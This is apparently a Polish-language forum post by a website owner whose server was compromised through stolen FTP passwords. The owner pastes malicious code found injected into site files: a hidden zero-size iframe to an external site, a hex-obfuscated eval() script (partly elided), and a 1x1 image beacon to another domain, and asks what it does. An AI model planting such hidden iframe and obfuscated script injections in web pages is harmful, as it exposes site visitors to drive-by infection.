Parę dni temu ktoś wbił się nam na serwer. Wg administratorów serwera, zostały wykradzione hasła ftp...
W 2 plikach pojawił się kod:
<iframe border="0" frameborder="no" src="http://nudeteens.in/3/index.php" width="0" height="0"> <!-- [ c2d6386914320468a51227393bb2d185 ] --> <script>eval('\x66\x75\x6e\x63\x74\x69\x6f x30\x32\x25\x30\x32\x25\x31\x39\x25\x37\x66\x25\x33\x39\x25\x32\x33\x25\x37\x37\
x25\x33\x32\x25\x36\x30\x25\x32\x61\x25\x36\x66\x25\x36\x34\x25\x36\x39 \x25\x33\x33\x25\x36\x30\x25\x31\x61\x25\x36\x65\x25\x31\x30\x25\x33\x33\x25\x30
\x37\x25\x34\x63\x25\x30\x39\x25\x33\x65\x25\x36\x32\x25\x33\x38\x25\x33 [... tu cała masa linii tego typu ...] \x32\x25\x33\x38\x25\x31\x65\x25\x36\x66\x25\x35\x32\x25\x31\x39\x25\x31\x37\x25
\x31\x31\x25\x33\x66\x25\x33\x31\x25\x33\x31\x25\x34\x65\x25\x35\x65\x25 \x37\x38\x25\x36\x35\x25\x31\x61\x25\x33\x63\x25\x37\x31\x25\x36\x65\x25\x33\x62
\x25\x32\x66\x25\x32\x32\x25\x33\x64\x25\x31\x62\x25\x31\x30\x25\x33\x61 \x25\x37\x34\x25\x37\x61\x25\x37\x66\x27\x29\x3b'); </script><!-- end --> <img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
Ponadto do praktycznie wszystkich indexów została doklejona ostatnia linijka powyższego kodu, tuż za </html> pojawiło się
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16815234">
A więc pakowało jakiś wredny skrypt na stronę.
Miał może ktoś coś podobnego i wie co taki wirus robi?
I czy poza zawirusowanym kompem kogoś kto loguje się na ftp, są jakieś inne metody wykradania haseł?